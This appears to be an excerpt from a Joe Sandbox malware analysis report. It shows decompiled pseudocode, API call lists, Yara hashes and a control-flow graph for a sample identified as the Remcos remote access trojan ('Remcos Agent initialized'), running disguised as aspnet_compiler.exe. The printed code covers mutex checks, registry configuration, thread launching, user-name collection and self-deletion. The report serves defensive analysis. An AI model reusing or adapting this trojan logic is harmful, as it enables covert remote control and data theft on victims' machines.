				_t2 = CryptAcquireContextA(__ecx, 0, 0, 1, 0xf0000000); // executed
				if(_t2 != 0) {
					if(CryptGenRandom( *_t10, _v12, _t9) != 0) {
						CryptReleaseContext( *_t10, 0);
						return 0;
					}
					_push(0xffffff98);
					L2:
					_pop(_t6);
					return _t6;
				}
				_push(0xffffff99);
				goto L2;
			}








                0x0043214d
                0x0043214f
                0x00432154
                0x0043215c
                0x00432172
                0x0043217c
                0x00000000
                0x00432182
                0x00432174
                0x00432160
                0x00432160
                0x00000000
                0x00432160
                0x0043215e
                0x00000000

                APIs
                • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00431DCA,00000034,?,?,01415250), ref: 00432154
                • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00431E5D,00000000,?,00000000), ref: 0043216A
                • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00431E5D,00000000,?,00000000,0041CB5C), ref: 0043217C
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Crypt$Context$AcquireRandomRelease
                • String ID:
                • API String ID: 1815803762-0
                • Opcode ID: 87b52fe04148b378890c993190cc93a161ae8e284d280082790b9f2e946aa0e2
                • Instruction ID: adb372f61302f159ea37c7bd5427d8c721a4b5411f3f4e54cdc0eebfb1d2689f
                • Opcode Fuzzy Hash: 87b52fe04148b378890c993190cc93a161ae8e284d280082790b9f2e946aa0e2
                • Instruction Fuzzy Hash: 98E0923130C310BBFF310F25BE08F173A94EB89B75F21063AF211E40E4D6918801961C
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0041A168 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                Download Yara Rule
                C-Code - Quality: 82%
                			E0041A168(void* __ecx, void* __edx, void* __edi, void* __eflags) {
				char _v8;
				long _v12;
				char _v36;
				char _v60;
				char _v92;
				short _v604;
				void* __ebp;
				void* _t26;
				void* _t35;
				void* _t39;
				void* _t40;
				void* _t41;

				_t41 = __eflags;
				_t35 = __edx;
				_v8 = 0x10;
				_t39 = __ecx;
				 *0x472afc(1,  &_v92,  &_v8); // executed
				_v12 = 0x100;
				GetUserNameW( &_v604,  &_v12); // executed
				E00402FF4(_t26, _t39, E004042DC(_t26,  &_v36,  &_v92, _t40, _t41, E0040415E(_t26,  &_v60, _t35, _t40, "/")), __edi, _t40, _t41,  &_v604);
				E00401EE9();
				E00401EE9();
				return _t39;
			}















                0x0041a168
                0x0041a168
                0x0041a175
                0x0041a180
                0x0041a185
                0x0041a18e
                0x0041a19d
                0x0041a1c8
                0x0041a1d1
                0x0041a1d9
                0x0041a1e4

                APIs
                • GetUserNameW.ADVAPI32(?,00000010), ref: 0041A19D
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: NameUser
                • String ID:
                • API String ID: 2645101109-0
                • Opcode ID: 984a9e89f53b954de54a43e274cc1f929642feed54526eb4c94be657c4784051
                • Instruction ID: ca40992a929d7f440b27bf36de23ad6c7f00c11e63c364431abc424016e70018
                • Opcode Fuzzy Hash: 984a9e89f53b954de54a43e274cc1f929642feed54526eb4c94be657c4784051
                • Instruction Fuzzy Hash: 1F01FF7290011DABCB04EBD5DC45ADEB7BCEF44319F10016AB505B61D1EEB86A89CB98
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004255BC Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: recv
                • String ID:
                • API String ID: 1507349165-0
                • Opcode ID: 4a5bcecb3f40c54b5b167585e102f21ee889ffcc3164b5e38b4e4b437a608611
                • Instruction ID: 746b65c02e61119df28bf9f7234443caa874ec4429a0c44ab9f61596d4479e10
                • Opcode Fuzzy Hash: 4a5bcecb3f40c54b5b167585e102f21ee889ffcc3164b5e38b4e4b437a608611
                • Instruction Fuzzy Hash: 96B092B9108202FFCA160B60DD0887A7EAAABC8381F008A2CF186411B1C636C451AB26
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00433452 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00433452() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E0043345E); // executed
				return _t1;
			}




                0x00433457
                0x0043345d

                APIs
                • SetUnhandledExceptionFilter.KERNELBASE(Function_0003345E,00433185), ref: 00433457
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ExceptionFilterUnhandled
                • String ID:
                • API String ID: 3192549508-0
                • Opcode ID: fb3aaaa52268b5920dbf3edef77856ac2629be7d88f1c4c86b65aace9ef12b18
                • Instruction ID: 3c5ffc1f6ca5581617dc18551564c5a1f11bccfc48c0ed950457c3a26c38d402
                • Opcode Fuzzy Hash: fb3aaaa52268b5920dbf3edef77856ac2629be7d88f1c4c86b65aace9ef12b18
                • Instruction Fuzzy Hash:
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040DEC9 Relevance: 86.6, APIs: 17, Strings: 32, Instructions: 804COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 7 40dec9-40df4b call 41b4c9 GetModuleFileNameW call 40e8e0 call 4020d6 * 2 call 41a976 call 40f05a call 401e6d call 43e5d0 24 40df97-40e05f call 401e45 call 401f8b call 401e45 call 4052fe call 408832 call 401fc2 call 401fb8 * 2 call 401e45 call 401fa0 call 405a86 call 401e45 call 4051c3 call 401e45 call 4051c3 7->24 25 40df4d-40df92 call 40f0f6 call 401e45 call 401f8b call 41047a call 40f0a7 call 40e8cd 7->25 71 40e061-40e0ac call 406292 call 401fc2 call 401fb8 call 401f8b call 412831 24->71 72 40e0b2-40e0cd call 401e45 call 40af37 24->72 51 40e423-40e434 call 401fb8 25->51 71->72 105 40e86c-40e887 call 401f8b call 412c91 call 4119b8 71->105 81 40e141-40e148 call 40c577 72->81 82 40e0cf-40e0f0 call 401e45 call 401f8b OpenMutexA 72->82 91 40e151-40e158 81->91 92 40e14a-40e14c 81->92 99 40e0f2-40e0ff WaitForSingleObject CloseHandle 82->99 100 40e105-40e126 call 401f8b call 412831 82->100 96 40e15a 91->96 97 40e15c-40e168 call 419e1e 91->97 95 40e422 92->95 95->51 96->97 108 40e171-40e175 97->108 109 40e16a-40e16c 97->109 99->100 122 40e128-40e13b call 401f8b call 412c91 100->122 123 40e13c 100->123 130 40e88c-40e8bd call 41a7b9 call 401ee4 call 412d0b call 401ee9 * 2 105->130 111 40e1b4-40e1c7 call 401e45 call 401f8b 108->111 112 40e177 call 406d8a 108->112 109->108 136 40e1c9 call 406dc9 111->136 137 40e1ce-40e249 call 401e45 call 401f8b call 4086cb call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b 111->137 121 40e17c-40e17e 112->121 127 40e180-40e185 call 406dac call 4068d4 121->127 128 40e18a-40e19d call 401e45 call 401f8b 121->128 122->123 123->81 127->128 128->111 151 40e19f-40e1a5 128->151 165 40e8c2-40e8cc call 40d246 call 414271 130->165 136->137 184 40e2b1-40e2b5 137->184 185 40e24b-40e264 call 401e45 call 401f8b call 43a3d6 137->185 151->111 152 40e1a7-40e1ad 151->152 152->111 155 40e1af call 4068d4 152->155 155->111 187 40e437-40e497 call 435760 call 40245c call 401f8b * 2 call 4129e0 call 4086cb 184->187 188 40e2bb-40e2c2 184->188 185->184 211 40e266-40e2ac call 401e45 call 401f8b call 401e45 call 401f8b call 40cf38 call 401ef3 call 401ee9 185->211 241 40e49c-40e4f0 call 401e45 call 401f8b call 402073 call 401f8b call 412a57 call 401e45 call 401f8b call 43a3ac 187->241 190 40e340-40e34a call 4086cb 188->190 191 40e2c4-40e33e call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 40c307 188->191 197 40e34f-40e373 call 40245c call 4330a3 190->197 191->197 219 40e382 197->219 220 40e375-40e380 call 435760 197->220 211->184 225 40e384-40e3cf call 401ee4 call 43e0d9 call 40245c call 401f8b call 40245c call 401f8b call 412c2f 219->225 220->225 279 40e3d4-40e3f9 call 4330ac call 401e45 call 40af37 225->279 294 40e4f2 241->294 295 40e50d-40e50f 241->295 279->241 293 40e3ff-40e41e call 401e45 call 41a7b9 call 40e991 279->293 293->241 313 40e420 293->313 297 40e4f4-40e50b call 41b6a6 CreateThread 294->297 298 40e511-40e513 295->298 299 40e515 295->299 300 40e51b-40e5e3 call 402073 * 2 call 41a04a call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 43a3ac call 401e45 call 401f8b call 401e45 call 401f8b call 40949a call 401e45 call 401f8b 297->300 298->297 299->300 347 40e5e5-40e61c call 432df5 call 401e45 call 401f8b CreateThread 300->347 348 40e61e 300->348 313->95 349 40e620-40e638 call 401e45 call 401f8b 347->349 348->349 359 40e676-40e689 call 401e45 call 401f8b 349->359 360 40e63a-40e671 call 432df5 call 401e45 call 401f8b CreateThread 349->360 370 40e6e9-40e6fc call 401e45 call 401f8b 359->370 371 40e68b-40e6e4 call 401e45 call 401f8b call 401e45 call 401f8b call 40ceec call 401ef3 call 401ee9 CreateThread 359->371 360->359 382 40e737-40e75b call 41a168 call 401ef3 call 401ee9 370->382 383 40e6fe-40e732 call 401e45 call 401f8b call 401e45 call 401f8b call 43a3ac call 40b6dc 370->383 371->370 403 40e760-40e773 CreateThread 382->403 404 40e75d-40e75e SetProcessDEPPolicy 382->404 383->382 407 40e781-40e788 403->407 408 40e775-40e77f CreateThread 403->408 404->403 411 40e796-40e79d 407->411 412 40e78a-40e794 CreateThread 407->412 408->407 415 40e7ab 411->415 416 40e79f-40e7a2 411->416 412->411 419 40e7b0-40e7e4 call 402073 call 4052dd call 402073 call 41a04a call 401fb8 415->419 420 40e7a4-40e7a9 416->420 421 40e7e9-40e7fc call 401f8b call 4127e7 416->421 419->421 420->419 429 40e801-40e804 421->429 429->165 430 40e80a-40e84a call 41a7b9 call 401ee4 call 412903 call 401ee9 call 401ee4 429->430 446 40e863-40e868 DeleteFileW 430->446 447 40e86a 446->447 448 40e84c-40e84f 446->448 447->130 448->130 449 40e851-40e85e Sleep call 401ee4 448->449 449->446
                C-Code - Quality: 91%
                			E0040DEC9(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a12) {
				char _v524;
				char _v700;
				char _v720;
				char _v724;
				char _v728;
				char _v752;
				char _v756;
				char _v760;
				char _v772;
				struct _SECURITY_ATTRIBUTES* _v776;
				char _v780;
				char _v784;
				intOrPtr _v796;
				intOrPtr _v812;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t76;
				void* _t79;
				char* _t94;
				void* _t95;
				struct _SECURITY_ATTRIBUTES* _t97;
				struct _SECURITY_ATTRIBUTES* _t98;
				struct _SECURITY_ATTRIBUTES* _t100;
				void* _t116;
				void* _t117;
				void* _t124;
				char _t130;
				struct _SECURITY_ATTRIBUTES** _t135;
				signed char* _t140;
				void* _t143;
				void* _t145;
				void* _t158;
				struct _SECURITY_ATTRIBUTES* _t161;
				intOrPtr _t163;
				struct _SECURITY_ATTRIBUTES* _t164;
				struct _SECURITY_ATTRIBUTES* _t171;
				WCHAR* _t179;
				struct _SECURITY_ATTRIBUTES* _t180;
				intOrPtr _t194;
				intOrPtr* _t197;
				void* _t199;
				void* _t204;
				char* _t207;
				void* _t209;
				void* _t217;
				void* _t223;
				void* _t224;
				signed int _t225;
				char* _t232;
				void* _t234;
				intOrPtr* _t243;
				void* _t245;
				intOrPtr* _t253;
				void* _t255;
				struct _SECURITY_ATTRIBUTES* _t273;
				void* _t286;
				struct _SECURITY_ATTRIBUTES* _t287;
				struct _SECURITY_ATTRIBUTES* _t297;
				intOrPtr* _t305;
				void* _t324;
				char* _t382;
				signed int _t414;
				signed int _t418;
				char _t420;
				void* _t423;
				void* _t479;
				void* _t496;
				struct _SECURITY_ATTRIBUTES* _t497;
				intOrPtr _t498;
				char* _t503;
				intOrPtr* _t505;
				void* _t508;
				void* _t509;
				struct _SECURITY_ATTRIBUTES* _t510;
				void* _t511;
				void* _t514;
				signed int _t517;
				signed int _t519;
				void* _t522;
				void* _t523;
				void* _t524;
				void* _t526;
				void* _t527;
				void* _t528;
				void* _t529;
				void* _t530;
				void* _t531;
				void* _t535;
				void* _t537;

				_t537 = __eflags;
				_t479 = __edx;
				_t517 = _t519;
				 *0x470d40 = _a4;
				_push(_t286);
				E0041B4C9();
				_t497 = 0;
				GetModuleFileNameW(0, "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", 0x104);
				E0040E8E0( &_v724, _t479, _t537);
				_t522 = (_t519 & 0xfffffff8) - 0x2f4;
				E004020D6(_t286, _t522, _t479, _t537, 0x4732bc);
				_t523 = _t522 - 0x18;
				E004020D6(_t286, _t523, _t479, _t537,  &_v728);
				_t76 = E0041A976( &_v756, _t479); // executed
				_t524 = _t523 + 0x30;
				E0040F05A(_t479, _t76);
				E00401E6D( &_v760, _t479);
				_t79 = E0043E5D0(_a12, "-l");
				_t305 = _t496;
				if(_t79 != 0) {
					_t287 = 3;
					_t501 = 0x473298;
					__eflags =  *((char*)(E00401F8B(E00401E45(0x473298, _t479, _t517, __eflags, _t287))));
					 *0x470b32 = __eflags != 0;
					_t481 = E004052FE( &_v780, "Software\\", _t517, E00401E45(0x473298, _t479, _t517, __eflags, 0xe));
					E00401FC2(0x473238, _t83, 0x473298, E00408832(_t287,  &_v756, _t83, 0, _t517, __eflags, "\\"));
					E00401FB8();
					E00401FB8();
					E00401FA0(0x473268, E00401E45(0x473298, _t83, _t517, __eflags, 0xe));
					L00405A86(_t287, 0x4732d4, _t83, "Exe");
					E00401E45(0x473298, _t83, _t517, __eflags, 0x32);
					__eflags =  *((char*)(E004051C3(0)));
					 *0x470d4b = __eflags != 0;
					E00401E45(0x473298, _t83, _t517, __eflags, 0x33);
					_t94 = E004051C3(0);
					__eflags =  *_t94;
					 *0x470d60 =  *_t94 != 0;
					__eflags =  *0x470d4b;
					if(__eflags == 0) {
						L5:
						_v776 = _t497;
						_t95 = E00401E45(_t501, _t481, _t517, __eflags, 0xd);
						_t482 = "0";
						_t324 = _t95;
						__eflags = E0040AF37(__eflags);
						if(__eflags != 0) {
							_t514 = OpenMutexA(0x100000, _t497, E00401F8B(E00401E45(_t501, "0", _t517, __eflags, 7)));
							__eflags = _t514;
							if(_t514 != 0) {
								WaitForSingleObject(_t514, 0xea60);
								CloseHandle(_t514);
							}
							_t482 = E00401F8B(0x473238);
							_t273 = E00412831(_t272, "Inj",  &_v776);
							_pop(_t324);
							__eflags = _t273;
							if(_t273 != 0) {
								_t482 = E00401F8B(0x473238);
								E00412C91(_t274, __eflags, "Inj");
								_pop(_t324);
							}
							_t501 = 0x473298;
						}
						_t97 = E0040C577();
						__eflags = _t97;
						if(_t97 != 0) {
							_t98 =  *0x472adc;
							__eflags = _t98;
							if(__eflags != 0) {
								_t98->nLength(); // executed
							}
							E00419E1E(_t324, __eflags); // executed
							_t100 =  *0x472ae8;
							__eflags = _t100;
							if(_t100 != 0) {
								 *0x46f9d0 = _t100->nLength();
							}
							__eflags = _v776 - _t497;
							if(__eflags == 0) {
								__eflags = E00406D8A(_t324);
								if(__eflags != 0) {
									E00406DAC();
									E004068D4(_t501);
								}
								__eflags =  *((char*)(E00401F8B(E00401E45(_t501, _t482, _t517, __eflags, 0x2e))));
								if(__eflags != 0) {
									__eflags =  *0x472ae8 - _t497;
									if(__eflags != 0) {
										__eflags =  *0x46f9d0 - _t497; // 0x1
										if(__eflags == 0) {
											E004068D4(_t501);
										}
									}
								}
							}
							__eflags =  *((char*)(E00401F8B(E00401E45(_t501, _t482, _t517, __eflags, 0x27))));
							if(__eflags != 0) {
								E00406DC9();
							}
							L004086CB(_t287, 0x473208, _t482, E00401F8B(E00401E45(_t501, _t482, _t517, __eflags, 0xb)));
							__eflags =  *((char*)(E00401F8B(E00401E45(_t501, _t482, _t517, __eflags, 4))));
							 *0x470b33 = __eflags != 0;
							__eflags =  *((char*)(E00401F8B(E00401E45(_t501, _t482, _t517, __eflags, 5))));
							 *0x470b30 = __eflags != 0;
							__eflags =  *((char*)(E00401F8B(E00401E45(_t501, _t482, _t517, __eflags, 8))));
							 *0x470b31 = __eflags != 0;
							__eflags =  *((char*)(E00401F8B(E00401E45(_t501, _t482, _t517, __eflags, _t287))));
							if(__eflags != 0) {
								__eflags = E0043A3D6(E00401F8B(E00401E45(_t501, _t482, _t517, __eflags, 0x30)));
								if(__eflags != 0) {
									_t253 = E00401F8B(E00401E45(_t501, _t482, _t517, __eflags, 9));
									_t255 = E00401F8B(E00401E45(0x473298, _t482, _t517, __eflags, 0x30));
									_t482 =  *_t253;
									E00401EF3(0x473250,  *_t253, _t253, E0040CF38( &_v780,  *_t253, _t255));
									E00401EE9();
									_t501 = 0x473298;
								}
							}
							__eflags = _v776 - _t497;
							if(_v776 != _t497) {
								E00435760(_t497,  &_v524, _t497, 0x208);
								_t288 = 0x473280;
								_t116 = E0040245C();
								_t117 = E00401F8B(0x473280);
								_t483 = E00401F8B(0x473238);
								E004129E0(_t119, "exepath",  &_v524, 0x208, _t117, _t116);
								_t526 = _t524 + 0x20;
								L004086CB(0x473280, 0x473220, _t119,  &_v524);
								_t503 = 0x473298;
								goto L42;
							} else {
								__eflags =  *0x470b32;
								if(__eflags == 0) {
									L004086CB(_t287, 0x473220, _t482, "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe");
								} else {
									E00401F8B(E00401E45(_t501, _t482, _t517, __eflags, 0x1e));
									_t297 =  *((intOrPtr*)(E00401F8B(E00401E45(_t501, _t482, _t517, __eflags, 0xc))));
									_t243 = E00401F8B(E00401E45(_t501, _t482, _t517, __eflags, 9));
									__eflags = _t297;
									_t501 = _t243;
									__eflags = _t297;
									_t245 = E00401F8B(E00401E45(0x473298, _t482, _t517, _t297, 0xa));
									E0040C307( *_t243, E00401F8B(E00401E45(0x473298, _t482, _t517, __eflags, 0x30)), __eflags, _t245, ((_t242 & 0xffffff00 | _t297 != 0x00000000) & 0 | __eflags != 0x00000000) & 0x000000ff, (_t242 & 0xffffff00 | _t297 != 0x00000000) & 0x000000ff);
									_t524 = _t524 + 0xc;
								}
								_t217 = E0040245C();
								_t423 = 2;
								_t294 =  ~(__eflags > 0) | (_t217 + 0x00000001) * 0x00473220;
								_push( ~(__eflags > 0) | (_t217 + 0x00000001) * 0x00473220);
								_t510 = E004330A3(_t423, (_t217 + 1) * 0x473220 >> 0x20, _t501, __eflags);
								__eflags = _t510;
								if(_t510 == 0) {
									_t510 = _t497;
								} else {
									E00435760(_t497, _t510, _t497, _t294);
									_t524 = _t524 + 0xc;
								}
								E0043E0D9(_t510, E00401EE4(0x473220));
								_t288 = 0x473280;
								_t223 = E0040245C();
								_t224 = E00401F8B(0x473280);
								_t225 = E0040245C();
								E00412C2F(E00401F8B(0x473238), __eflags, "exepath", _t510, 2 + _t225 * 2, _t224, _t223); // executed
								E004330AC(_t510);
								_t526 = _t524 + 0x1c;
								_t503 = 0x473298;
								E00401E45(0x473298, _t227, _t517, __eflags, 0xd);
								_t483 = "0";
								__eflags = E0040AF37(__eflags);
								if(__eflags == 0) {
									L42:
									_push(1);
									_t124 = E00401F8B(E00401E45(_t503, _t483, _t517, __eflags, 0x34));
									_t527 = _t526 - 0x18;
									E00402073(_t288, _t527, _t483, _t517, _t124);
									_push("licence");
									_t484 = E00401F8B(0x473238); // executed
									E00412A57(0x473238, _t126); // executed
									_t528 = _t527 + 0x20;
									_t130 = E0043A3AC(_t128, E00401F8B(E00401E45(_t503, _t126, _t517, __eflags, 0x28)));
									 *0x470d48 = _t130;
									__eflags = _t130 - 2;
									if(_t130 != 2) {
										__eflags = _t130 - 1;
										if(_t130 != 1) {
											_t498 = CreateThread;
										} else {
											_t420 = 0;
											goto L44;
										}
									} else {
										_t420 = 1;
										L44:
										E0041B6A6(_t288, _t420, _t484, _t497);
										_t498 = __imp__CreateThread; // 0x747143e0
										CreateThread(_t497, _t497, E0041BD68, _t497, _t497, _t497);
									}
									_t529 = _t528 - 0x18;
									E00402073(_t288, _t529, _t484, _t517, "Remcos Agent initialized");
									_t530 = _t529 - 0x18;
									E00402073(_t288, _t530, _t484, _t517, "i");
									E0041A04A(_t288, _t498);
									_t531 = _t530 + 0x30;
									_t135 = E00401F8B(E00401E45(_t503, _t484, _t517, __eflags, 0x37));
									_v796 =  *((intOrPtr*)(E00401F8B(E00401E45(_t503, _t484, _t517, __eflags, 0x10))));
									_t140 = E00401F8B(E00401E45(_t503, _t484, _t517, __eflags, 0xf));
									__eflags =  *_t135;
									_t504 = _t140;
									_t143 = E0043A3AC(_t141, E00401F8B(E00401E45(0x473298, _t484, _t517,  *_t135, 0x36)));
									_t145 = E00401F8B(E00401E45(0x473298, _t484, _t517, __eflags, 0x11));
									E0040949A(0x473298, _t498, __eflags,  *_t140 & 0x000000ff, _v812, E00401F8B(E00401E45(0x473298, _t484, _t517, __eflags, 0x31)), _t145, _t143, (_t139 & 0xffffff00 | __eflags != 0x00000000) & 0x000000ff); // executed
									__eflags =  *((char*)(E00401F8B(E00401E45(0x473298, _t484, _t517, __eflags, 0x14)))) - 1;
									if(__eflags != 0) {
										_t287 = 0;
										__eflags = 0;
									} else {
										_t209 = 2;
										_t509 = E00432DF5(_t484, _t504, __eflags, _t209);
										_t287 = 0;
										 *_t509 = 0;
										_t418 = E00401E45(0x473298, _t484, _t517, __eflags, 0x35);
										__eflags =  *(E00401F8B(_t418));
										 *((char*)(_t509 + 1)) = _t418 & 0xffffff00 | __eflags != 0x00000000;
										CreateThread(0, 0, E00418B0F, _t509, 0, 0);
									}
									_t501 = 0x473298;
									__eflags =  *((char*)(E00401F8B(E00401E45(0x473298, _t484, _t517, __eflags, 0x16)))) - 1;
									if(__eflags == 0) {
										_t204 = 2;
										_t508 = E00432DF5(_t484, 0x473298, __eflags, _t204);
										 *_t508 = 1;
										_t414 = E00401E45(0x473298, _t484, _t517, __eflags, 0x35);
										_t207 = E00401F8B(_t414);
										__eflags =  *_t207;
										_t49 =  *_t207 != 0;
										__eflags = _t49;
										 *((char*)(_t508 + 1)) = _t414 & 0xffffff00 | _t49;
										CreateThread(_t287, _t287, E00418B0F, _t508, _t287, _t287);
										_t501 = 0x473298;
									}
									__eflags =  *((char*)(E00401F8B(E00401E45(_t501, _t484, _t517, __eflags, 0x23)))) - 1;
									if(__eflags == 0) {
										 *0x470a85 = 1;
										_t197 = E00401F8B(E00401E45(_t501, _t484, _t517, __eflags, 0x25));
										_t199 = E00401F8B(E00401E45(0x473298, _t484, _t517, __eflags, 0x26));
										_t484 =  *_t197;
										E00401EF3(0x472d40,  *_t197, _t197, E0040CEEC( &_v780,  *_t197, _t199));
										E00401EE9();
										CreateThread(_t287, _t287, E00401BC9, _t287, _t287, _t287);
										_t501 = 0x473298;
									}
									__eflags =  *((char*)(E00401F8B(E00401E45(_t501, _t484, _t517, __eflags, 0x2b)))) - 1;
									if(__eflags == 0) {
										_t501 = E00401F8B(E00401E45(_t501, _t484, _t517, __eflags, 0x2c));
										_t194 = E0043A3AC(_t192, E00401F8B(E00401E45(0x473298, _t484, _t517, __eflags, 0x2d)));
										__eflags =  *_t501;
										_t484 = _t194;
										__eflags =  *_t501 != 0;
										E0040B6DC(_t194);
									}
									_t158 = E0041A168( &_v772, _t484, _t498, __eflags); // executed
									E00401EF3(0x4732a4, _t484, _t501, _t158);
									E00401EE9();
									_t161 =  *0x472ae0;
									__eflags = _t161;
									if(_t161 != 0) {
										_t161->nLength(_t287); // executed
									}
									CreateThread(_t287, _t287, E0040ECEA, _t287, _t287, _t287); // executed
									__eflags =  *0x470d4b;
									if( *0x470d4b != 0) {
										CreateThread(_t287, _t287, E0041163A, _t287, _t287, _t287);
									}
									__eflags =  *0x470d60;
									if( *0x470d60 != 0) {
										CreateThread(_t287, _t287, E00411C1E, _t287, _t287, _t287);
									}
									_t163 =  *0x46f9d0; // 0x1
									_t164 = _t163 - _t287;
									__eflags = _t164;
									if(__eflags == 0) {
										_push("User");
										goto L67;
									} else {
										__eflags = _t164 - 1;
										if(__eflags == 0) {
											_push("Administrator");
											L67:
											E004052DD(_t287, _t531 - 0x18, "Access Level: ", _t517, __eflags, E00402073(_t287,  &_v776, _t484, _t517));
											E00402073(_t287, _t531 - 4, "Access Level: ", _t517, "i");
											E0041A04A(_t287, _t498);
											E00401FB8();
										}
									}
									_t497 = 0x473238;
									_t171 = E004127E7(0x473238, E00401F8B(0x473238), "del"); // executed
									_pop(_t382);
									__eflags = _t171;
									if(__eflags != 0) {
										E00412903( &_v752, 0x80000001, E00401EE4(E0041A7B9( &_v776, 0x473238)), L"del");
										E00401EE9();
										_t179 = E00401EE4( &_v752);
										_t501 = DeleteFileW;
										while(1) {
											_t180 = DeleteFileW(_t179);
											__eflags = _t180;
											if(_t180 != 0) {
												break;
											}
											__eflags = _t287 - 0xa;
											if(_t287 < 0xa) {
												_t287 =  &(_t287->nLength);
												__eflags = _t287;
												Sleep(0xa);
												_t179 = E00401EE4( &_v752);
												continue;
											}
											goto L75;
										}
										goto L75;
									}
									goto L76;
								} else {
									_t232 = E00401E45(0x473298, "0", _t517, __eflags, 0xd);
									_t535 = _t526 - 0x18;
									_t483 = _t232;
									E0041A7B9(_t535, _t232);
									_t234 = E0040E991(__eflags);
									_t526 = _t535 + 0x18;
									__eflags = _t234 - 1;
									if(__eflags != 0) {
										goto L42;
									} else {
										_push(3);
										goto L39;
									}
								}
							}
						} else {
							_push(2);
							L39:
							_pop(_t511);
							goto L40;
						}
					} else {
						E00401FC2(0x473370, 0x473268, 0x473298, E00406292( &_v772, 0x473268, _t517, "-W"));
						E00401FB8();
						_v784 = 0;
						_t481 = E00401F8B(0x473238);
						__eflags = E00412831(_t282, "WD",  &_v784);
						if(__eflags != 0) {
							E00412C91(E00401F8B(0x473238), __eflags, "WD");
							E004119B8();
							L75:
							E00412D0B(0x80000001, E00401EE4(E0041A7B9( &_v776, _t497)), L"del");
							E00401EE9();
							_t382 =  &_v752;
							E00401EE9(); // executed
							L76:
							E0040D246(__eflags); // executed
							E00414271(); // executed
							asm("int3");
							_push(_t501);
							_t505 = _t382 + 0x68;
							E0040F0C7(_t287, _t505, _t505);
							_t305 = _t505;
							 *_t305 = 0x465554;
							 *_t305 = 0x465510;
							return E00434069(_t305);
						} else {
							goto L5;
						}
					}
				} else {
					_push(__ecx);
					_push(__ecx);
					__ecx =  &_v700;
					__eax = E0040F0F6( &_v700, __edx, __eflags, "license_code.txt", 2);
					__ecx = 0x473298;
					__ecx = E00401E45(0x473298, __edx, __ebp, __eflags, 0x34);
					__edx = __eax;
					__ecx =  &_v720;
					__eax = E0041047A( &_v720, __edx, __eflags);
					__ecx =  &_v720;
					__eax = E0040F0A7( &_v720, __edx, __eflags);
					__ecx =  &_v720;
					L77();
					0 = 1;
					L40:
					E00401FB8();
					return _t511;
				}
			}






























































































                0x0040dec9
                0x0040dec9
                0x0040deca
                0x0040ded8
                0x0040dedd
                0x0040dee0
                0x0040deef
                0x0040def2
                0x0040defc
                0x0040df01
                0x0040df0b
                0x0040df10
                0x0040df1a
                0x0040df23
                0x0040df28
                0x0040df2c
                0x0040df35
                0x0040df42
                0x0040df48
                0x0040df4b
                0x0040df99
                0x0040df9a
                0x0040dfb7
                0x0040dfba
                0x0040dfd6
                0x0040dfe8
                0x0040dff1
                0x0040dffa
                0x0040e00e
                0x0040e01d
                0x0040e027
                0x0040e038
                0x0040e03b
                0x0040e042
                0x0040e049
                0x0040e04e
                0x0040e051
                0x0040e058
                0x0040e05f
                0x0040e0b2
                0x0040e0b6
                0x0040e0ba
                0x0040e0bf
                0x0040e0c4
                0x0040e0cb
                0x0040e0cd
                0x0040e0ec
                0x0040e0ee
                0x0040e0f0
                0x0040e0f8
                0x0040e0ff
                0x0040e0ff
                0x0040e11b
                0x0040e11d
                0x0040e123
                0x0040e124
                0x0040e126
                0x0040e134
                0x0040e136
                0x0040e13b
                0x0040e13b
                0x0040e13c
                0x0040e13c
                0x0040e141
                0x0040e146
                0x0040e148
                0x0040e151
                0x0040e156
                0x0040e158
                0x0040e15a
                0x0040e15a
                0x0040e15c
                0x0040e161
                0x0040e166
                0x0040e168
                0x0040e16c
                0x0040e16c
                0x0040e171
                0x0040e175
                0x0040e17c
                0x0040e17e
                0x0040e180
                0x0040e185
                0x0040e185
                0x0040e19a
                0x0040e19d
                0x0040e19f
                0x0040e1a5
                0x0040e1a7
                0x0040e1ad
                0x0040e1af
                0x0040e1af
                0x0040e1ad
                0x0040e1a5
                0x0040e19d
                0x0040e1c4
                0x0040e1c7
                0x0040e1c9
                0x0040e1c9
